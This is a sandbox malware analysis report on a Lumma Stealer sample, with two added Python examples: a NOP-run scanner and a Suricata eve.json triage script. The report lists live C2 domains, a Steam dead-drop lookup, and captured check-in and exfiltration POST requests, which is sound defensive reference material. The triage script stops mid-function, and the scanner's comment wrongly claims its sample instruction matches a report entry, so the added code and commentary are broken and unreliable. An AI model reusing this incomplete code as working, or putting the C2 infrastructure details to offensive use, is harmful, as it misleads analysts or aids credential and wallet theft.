
Windows Analysis Report
MPgkx6bQIQ.exe

Overview

General Information

Sample name: MPgkx6bQIQ.exe (renamed because the original name is a hash value)
Original sample name: 1663e17268ae9d60dd70ae27b8ea43ab.exe
Analysis ID: 1581627
MD5: 1663e17268ae9d60dd70ae27b8ea43ab
SHA1: 95a8475a8682188c8a99d66b35a0157cb8788219
SHA256: fbc834cf913a08c6e1cba50ca8dc2b072a4e252f12448a7f5e95d3a0b1de6b7a
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • MPgkx6bQIQ.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\MPgkx6bQIQ.exe" MD5: 1663E17268AE9D60DD70AE27B8EA43AB)
    • WerFault.exe (PID: 8024 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 1760 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["scentniej.buzz", "inherineau.buzz", "rebuildeso.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "prisonyfork.buzz"], "Build id": "4h5VfH--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000003.1514080921.0000000003047000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.1430582996.00000000024D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
Source | Rule | Description | Author | Strings
0.3.MPgkx6bQIQ.exe.24d0000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0.2.MPgkx6bQIQ.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0.2.MPgkx6bQIQ.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0.3.MPgkx6bQIQ.exe.24d0000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-28T10:05:18.031260+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 23.55.153.106 | 443 | TCP
2024-12-28T10:05:20.443634+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:22.525521+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:25.031841+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49709 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:27.299569+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49710 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:29.962225+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49711 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:21.198377+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:23.309324+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:21.198377+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:23.309324+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:16.144554+0100 | 2058572 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 50102 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:15.286974+0100 | 2058576 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 63357 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:16.294003+0100 | 2058578 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 54158 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:15.857537+0100 | 2058580 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 61993 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:15.432014+0100 | 2058584 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 55711 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:15.573887+0100 | 2058586 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 50775 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:15.715330+0100 | 2058588 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 58380 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:16.000648+0100 | 2058590 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 60487 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:25.937122+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49709 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:18.814081+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49706 | 23.55.153.106 | 443 | TCP


AV Detection

Source: 0.3.MPgkx6bQIQ.exe.24d0000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["scentniej.buzz", "inherineau.buzz", "rebuildeso.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "prisonyfork.buzz"], "Build id": "4h5VfH--"}
Source: MPgkx6bQIQ.exe | Virustotal: Detection: 41%
Source: MPgkx6bQIQ.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: MPgkx6bQIQ.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: hummskitnj.buzz
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: appliacnesot.buzz
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: screwamusresz.buzz
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: inherineau.buzz
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: scentniej.buzz
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: rebuildeso.buzz
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: prisonyfork.buzz
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String decryptor: 4h5VfH--
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_00415298 CryptUnprotectData, 0_2_00415298

Compliance

Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Unpacked PE file: 0.2.MPgkx6bQIQ.exe.400000.0.unpack
Source: MPgkx6bQIQ.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49711 version: TLS 1.2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h0_2_024999D7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_024AC98D
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_024AC99C
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ebp, dword ptr [eax]0_2_024B6E67
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov word ptr [eax], dx0_2_02495F79
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_024A1F77
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov word ptr [ebx], dx0_2_02498F35
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_02498F35
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h0_2_024BCFC7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]0_2_0248DF8C
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movsx eax, byte ptr [esi]0_2_024BBC08
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_024A9C17
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_0249EC17
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh0_2_024B6C3B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov esi, eax0_2_024A3C9B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_024BAD19
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h0_2_024BCD87
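The "4x nop then <instruction>" entries above are the sandbox flagging runs of single-byte NOPs (0x90) wedged between live instructions, a pattern compilers do not emit inside a function body and that obfuscators and packers do. As an added illustration (not Joe Sandbox's own signature code), the Python below scans a code buffer for runs of four or more 0x90 bytes and reports the instruction bytes that follow each run, in the same phrasing the report uses. The byte sample is constructed, not taken from the sample; its two flagged instructions are encodings of entries listed above, and the base address 0x024A5000 is an assumed value chosen only to resemble the report's 0x024Axxxx addresses.

```python
"""Heuristic scan for runs of inlined single-byte NOPs (0x90) in a code
buffer, mirroring the "4x nop then <instruction>" entries in the report.
Added example; not Joe Sandbox's own signature logic."""
from typing import List, Tuple

NOP = 0x90


def find_nop_runs(code: bytes, min_run: int = 4, follow: int = 6) -> List[Tuple[int, int, bytes]]:
    """Return (offset, run_length, following_bytes) for every run of at least
    min_run consecutive 0x90 bytes. following_bytes are the first bytes of the
    instruction the NOPs were inlined in front of. A 2-byte NOP (66 90) does
    not extend a run because the 0x66 prefix is not 0x90."""
    hits: List[Tuple[int, int, bytes]] = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != NOP:
            i += 1
            continue
        start = i
        while i < n and code[i] == NOP:
            i += 1
        run = i - start
        if run >= min_run:
            hits.append((start, run, code[i:i + follow]))
    return hits


# Constructed .text slice (not bytes from the sample). Plain 32-bit x86
# encodings; the instructions after the NOP runs are two of those the
# report lists.
SAMPLE = bytes.fromhex(
    "55 8b ec "               # push ebp ; mov ebp, esp
    "90 90 90 90 "            # 4x nop                         <- flagged
    "66 c7 45 00 00 00 "      # mov word ptr [ebp+00h], 0000h
    "66 90 "                  # 2-byte alignment nop           <- not a 0x90 run
    "8b c8 "                  # mov ecx, eax
    "90 90 "                  # 2x nop                         <- below threshold
    "8b d1 "                  # mov edx, ecx
    "90 90 90 90 90 90 "      # 6x nop                         <- flagged
    "81 3c f3 61 e5 30 b4 "   # cmp dword ptr [ebx+esi*8], B430E561h
    "c3"                      # ret
)

# Assumed image base for pretty-printing; chosen to resemble the report's
# 0x024Axxxx addresses, not taken from the sample.
BASE = 0x024A5000


def describe(code: bytes = SAMPLE, base: int = BASE) -> List[str]:
    """Render hits in the report's own phrasing."""
    return [f"{base + off:08X}: {run}x nop then {after.hex(' ')}"
            for off, run, after in find_nop_runs(code)]


if __name__ == "__main__":
    for line in describe():
        print(line)
```

Compilers do pad for alignment, but with multi-byte NOPs such as 66 90 or 0F 1F 40 00, and MSVC fills the gap between functions with CC (int3); a run of single-byte 0x90 with live code on both sides is the case worth flagging, which is why the scanner keys on consecutive 0x90 bytes rather than on any NOP form.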

Networking

Source: Network traffic | Suricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.8:50102 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.8:60487 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.8:58380 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.8:55711 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.8:50775 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.8:63357 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.8:54158 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.8:61993 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49706 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49707 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49708 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49708 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49709 -> 172.67.157.254:443
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Malware configuration extractor | URLs: hummskitnj.buzz
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Joe Sandbox View | IP Address: 172.67.157.254
Source: Joe Sandbox View | IP Address: 23.55.153.106
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 172.67.157.254:443
Source: global traffic | HTTP traffic detected:
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 74
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=ZHXDL6PTAB9YT3TQ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12829
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=NMJDNFT3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15010
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=U5FRMBJPQ6LUHBEW3E
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20237
    Host: lev-tolstoi.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (10 occurrences)
Source: global traffic | HTTP traffic detected:
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: cashfuzysao.buzz
Source: global traffic | DNS traffic detected: DNS query: prisonyfork.buzz
Source: global traffic | DNS traffic detected: DNS query: rebuildeso.buzz
Source: global traffic | DNS traffic detected: DNS query: scentniej.buzz
Source: global traffic | DNS traffic detected: DNS query: inherineau.buzz
Source: global traffic | DNS traffic detected: DNS query: screwamusresz.buzz
Source: global traffic | DNS traffic detected: DNS query: appliacnesot.buzz
Source: global traffic | DNS traffic detected: DNS query: hummskitnj.buzz
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
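The Suricata alerts, the eight configured domains, the JA3 hash and the sequence of POST /api requests above are the kind of indicators an analyst folds into one triage pass over the sensor's eve.json output. The Python below is an added example, not Joe Sandbox or Emerging Threats code. Its eve records are constructed to mirror the traffic in this section (the domains, IPs, Steam profile ID, content lengths and JA3 hash are the report's); the http records assume a TLS-terminating proxy in front of Suricata, because on a plain wire capture the 443/tcp sessions would yield only tls and dns events. The size thresholds and the finding names are the example's own choices. One point it surfaces is that the host that actually received the check-in and the multipart uploads, lev-tolstoi.com, is not among the domains the configuration extractor recovered, so it is a live indicator that a static-config feed alone would miss.

```python
"""Triage of Suricata eve.json records against the indicators listed in the
report's Networking section. Added example; not Joe Sandbox or Emerging
Threats code."""
import json
from collections import defaultdict
from typing import Dict, Iterable, List

# C2 domains recovered by the malware configuration extractor (from the report).
CONFIG_C2 = {
    "scentniej.buzz", "inherineau.buzz", "rebuildeso.buzz", "screwamusresz.buzz",
    "hummskitnj.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "prisonyfork.buzz",
}
# JA3 client hash the report ties to the sample's TLS sessions.
KNOWN_JA3 = {"a0e9f5d64349fb13191bc781f81f42e1"}
# Example's own thresholds: multipart POSTs at or above EXFIL_MIN_BYTES count as
# uploads; form-encoded POSTs to /api at or below CHECKIN_MAX_BYTES as check-ins.
EXFIL_MIN_BYTES = 4096
CHECKIN_MAX_BYTES = 16

# Constructed eve.json lines mirroring the observed traffic. The http records
# assume a decrypting proxy sits in front of the sensor.
EVE_LINES = [
    '{"event_type":"dns","src_ip":"192.168.2.8","dest_ip":"1.1.1.1","dns":{"type":"query","rrname":"cashfuzysao.buzz","rrtype":"A"}}',
    '{"event_type":"dns","src_ip":"192.168.2.8","dest_ip":"1.1.1.1","dns":{"type":"query","rrname":"prisonyfork.buzz","rrtype":"A"}}',
    '{"event_type":"dns","src_ip":"192.168.2.8","dest_ip":"1.1.1.1","dns":{"type":"query","rrname":"steamcommunity.com","rrtype":"A"}}',
    '{"event_type":"dns","src_ip":"192.168.2.8","dest_ip":"1.1.1.1","dns":{"type":"query","rrname":"lev-tolstoi.com","rrtype":"A"}}',
    '{"event_type":"tls","src_ip":"192.168.2.8","dest_ip":"23.55.153.106","dest_port":443,"tls":{"sni":"steamcommunity.com","ja3":{"hash":"a0e9f5d64349fb13191bc781f81f42e1"}}}',
    '{"event_type":"tls","src_ip":"192.168.2.8","dest_ip":"172.67.157.254","dest_port":443,"tls":{"sni":"lev-tolstoi.com","ja3":{"hash":"a0e9f5d64349fb13191bc781f81f42e1"}}}',
    '{"event_type":"http","src_ip":"192.168.2.8","dest_ip":"23.55.153.106","http":{"hostname":"steamcommunity.com","url":"/profiles/76561199724331900","http_method":"GET","length":0}}',
    '{"event_type":"http","src_ip":"192.168.2.8","dest_ip":"172.67.157.254","http":{"hostname":"lev-tolstoi.com","url":"/api","http_method":"POST","http_content_type":"application/x-www-form-urlencoded","length":8}}',
    '{"event_type":"http","src_ip":"192.168.2.8","dest_ip":"172.67.157.254","http":{"hostname":"lev-tolstoi.com","url":"/api","http_method":"POST","http_content_type":"application/x-www-form-urlencoded","length":74}}',
    '{"event_type":"http","src_ip":"192.168.2.8","dest_ip":"172.67.157.254","http":{"hostname":"lev-tolstoi.com","url":"/api","http_method":"POST","http_content_type":"multipart/form-data","length":12829}}',
    '{"event_type":"http","src_ip":"192.168.2.8","dest_ip":"172.67.157.254","http":{"hostname":"lev-tolstoi.com","url":"/api","http_method":"POST","http_content_type":"multipart/form-data","length":15010}}',
]


def triage(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Group eve records into findings keyed by indicator type."""
    findings: Dict[str, List[str]] = defaultdict(list)
    post_hosts = set()
    for raw in lines:
        ev = json.loads(raw)
        kind = ev.get("event_type")
        if kind == "dns" and ev["dns"].get("type") == "query":
            name = ev["dns"]["rrname"].lower().rstrip(".")
            if name in CONFIG_C2:
                findings["c2_dns_lookup"].append(name)
        elif kind == "tls":
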